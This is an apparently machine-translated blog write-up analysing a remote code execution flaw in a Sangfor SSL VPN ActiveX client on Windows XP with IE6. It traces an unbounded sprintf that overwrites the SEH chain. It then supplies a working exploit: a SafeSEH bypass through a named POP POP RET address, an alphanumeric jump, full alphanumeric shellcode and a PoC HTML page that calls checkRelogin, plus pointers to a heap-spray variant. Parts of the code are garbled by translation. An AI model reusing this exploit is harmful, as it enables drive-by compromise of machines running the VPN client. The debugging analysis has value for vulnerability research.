Analysis of remote code execution vulnerability in an ssl vpn of a company | focus on hackers and geeks
Vulnerability description:
Through an analysis of a company's ssl vpn, it is found that it has a remote code execution vulnerability. for customers who install this version of ssl vpn, if they visit the webpage we specially constructed, this will lead to arbitrary code execution (such as hanging network horses), resulting in the fall of the machine.
Applicable environment: xp/win7.
Analysis process:
Environment: xp sp3
Browser: xp sp3's ie6
(Install Program, Program directory C: \ Program Files \ Sangfor \ SSL)
Installer:
Here is the attachment Installer: http://pan.baidu.com/s/1i4oqmP3
1. Use windbg to load poc (c: \ 11.htm)
When constructing a poc, you can use a for loop to construct a regular string. The poc code is as follows:
<Script> var buffer = "AAAAAAAAAAAAAAAAAA"; var temp = "AAAAAAAAAAAAAAAAAA"; for (var I = 0; I <1000; I ++) buffer ++ = temp; target. checkRelogin (buffer); </script>
However, sometimes we need to construct a regular string to locate the exception point easily,
The string used by the individual during debugging (because the string is too long and it is too long to be directly pasted in the article, it is given as a link ):
Https://raw.githubusercontent.com/CodingLi/test/master/exp_buffer
Enable ie in Windbg
Then g runs the program and an exception occurs. The exception is as follows:
0:000> g(830.fb8): Access violation - code c0000005 (first chance)First chance exceptions are reported before any exception handling.This exception may be expected and handled.eax=0000004a ebx=022cde82 ecx=0013e140 edx=00140000 esi=0013df00 edi=0013e140eip=77c12332 esp=0013dea0 ebp=0013deac iopl=0 nv up ei pl nz na po nccs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010202msvcrt!wscanf+0x6c:77c12332 8802 mov byte ptr [edx],al ds:0023:00140000=41*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\Program Files\Sangfor\SSL\ClientComponent\CSClientManagerPrj.dll -
When an exception occurs, we can view the stack status of the exception in kv. As shown in the figure above, the final function call process is CSClientManagerPrj + 0x46c0-> msvcrt! Sprintf + 0 × 31 last to msvrct! Wscanf + 0x6c.
CSClientManagerPrj is the module of the vpn program, which is also controllable. Guess the exception module CSClientManagerPrj. dll.
Code for exception:
0: 000> u msvcrt! Wscanf + 0x6cmsvcrt! Wscanf + 0x6c: 77c12332 8802 mov byte ptr [edx], al // exception 77c12334 ff01 inc dword ptr [ecx] 77c12336 0fb6c0 movzx eax, al77c12339 eb0c jmp msvcrt! Wscanf + 0x81 (77c12347) 77c1233b 0fbec0 movsx eax, al77c1233e 51 push ecx77c1233f 50 push eax77c12340 e818c9ffff call msvcrt! _ Flsbuf (77c0ec5d)
Use IDA to open CSClientManagerPrj. dll and locate the offset 0x46c0,
An exception may occur because the length of the string is not limited, resulting in a problem in sprintf.
Ii. Use OD to open the poc File
Because OD visualization is very convenient, I can debug it with OD. I usually try to use OD as much as possible. So here we will continue to use OD for tracking and debugging Based on the information obtained by windbg.
OD open the file and run F9. The ActiveX warning is displayed in ie. If it is not run for the time being, the program will be abnormal and we will not be able to locate the breakpoint,
In OD, Ctrl + g to locate the abnormal code. Address: 77c12332, that is, call msvcrt! Wscanf + 0x6c exception.
Of course, you can see the code at CSClientManagerPrj + 0x46c0:
However, this is irrelevant to the subsequent analysis.
Until F9, run:
77c12332 8802 mov byte ptr [edx],al
After F9, we will find that the strings in our poc are put on the memory one by one (stack), and input db edx in the command line, we can see our strings in the memory:
On the F9 side, you observe the memory data changes. When the memory data overwrites 0013ffed, pay attention to the slow execution. When you execute F9 several times, observe the edx value. When the edx value is 0014000, an exception occurs (that is, the value of edx when an exception occurs in windbg ). Why is an exception occurring when edx is set to 0014000? Let's look at the memory:
It can be seen from the above that the memory size starting from 140000 is read-only, all:
mov byte ptr [edx],al
A write exception occurred.
From this, we can determine the cause of the vulnerability:
Because the length of the string is not determined, the string overwrites the read-only region in sprintf, causing a write exception.
Iii. Vulnerability exploitation:
From the above analysis, the cause of the vulnerability is not that the string is too long to overwrite the return address of the function, but that it overwrites the read-only area, causing a memory write exception.
Run the following command in F9:
77c12332 8802 mov byte ptr [edx],al
Because the program exception is not caused by overwriting the return address of the string, we cannot control the return address of the function to execute our shellcode.
If an exception occurs, let's look at the exception handling function. We can look at the changes near the stack:
We can see that the string overwrites the exception handling chain on the exception stack. OD production depends on seh chain:
We can see that the overwrite exception processing function is the exception processing function corresponding to the current function exception. Because the exception handling function address is the place where the program is executed when an exception occurs,
Therefore, we can overwrite the code we want to execute in the exception handling function by controlling the string to control the program flow and finally execute our shellcode.
Identify the cause of the program exception and locate the exception handling area. The rest is to construct the stack data.
In xp sp3, safeseh must be bypassed to construct the stack data as follows:
During debugging tracking, it is found that data larger than 7f will change when it is copied to the memory, that is, non-visible characters cannot be copied to target. checkRelogin (buffer)
Directly stored in the memory. It is suggested that the characters may change in ascii-> unicode-> ascii. Therefore, when constructing a stack, all data must be smaller than 7f, that is, visible characters.
Use OD to find the No SafeSeh module in the program.
SafeSeh is disabled in several modules of EasyConnect vpn. Use Ollyfindaddr to find pop ret
There are many search results. Select an address smaller than 7f:
10013439 Found:POP EDI POP ESI RETN at 0x10013439 Module: C:\Program Files\Sangfor\SSL\ClientComponent\SSOClientPrj.dll
Jmp 06 (eb 06) cannot be used because the data is smaller than 7f. To ensure that the program jumps to our shellcode, use jnz 06 jz 04 (75 06 74 04 ):
Here we use the shellcode of the bullet box calculator,
Shellcode (used for seh ):
"LLLL\\XXXXXLD""TYIIIIIIIIIIIIIIII7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABu""JIylKXK2Wp5PWpapmYYu4qyP54LK2p00Nk62TLlKrrVtlKPrQ86""ox7QZq6UaYoll5l3QcLuR4lWPyQ8OvmuQO7irjRqBsglKF2TPnkp""JgLLKRlvqbXysSxS1XQpQLKCiWPC1KcLK2iTXM36Z0IlKwDLKuQHV""p1kOLlzaHO6mUQjgP8ipPuxvs3SMl8WKcMwTRU9tbxLKF8Q4fakc3V""lK6lBkLKShULfan3LKs4nk6aN0mY3ttdUtqKsk1qrypZbqIoKPQO3oQ""JNkTRZKNmCmSZwqlMlEX2Wpc0UP0PRHfQLKROowKOKeoKzPnUMr3f1xm""vnuOMMMkOn5GLc6qlgzopykkPbU4EoK77TSbRpopjwp0SYoZu1sSQplE3tnpeSH3UgpA";
Poc.html:
<Script> var buffer = "buffers"; buffer + = "buffers"; buffer + = unescape ("% 75% 06% 74% 04 "); buffer + = unescape ("% 39% 34% 01% 10"); buffer + = "LLLL \ XXXXXLD"; buffer + = "temperature"; var temp = "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa "; for (var I = 0; I <1000; I ++) buffer + = temp; target. checkRelogin (buffer); </script>
For test results, see:
Ps: Later I think about the shellcode structure, but it doesn't have to be a visible shellcode. If HeapSpray is used, it won't fill the memory with characters through the target. checkRelogin (buffer) function.
This prevents the construction of visible characters. Use msfvenom to generate the shellcode of the bullet calculator and construct the poc of HeapSpray using the following method: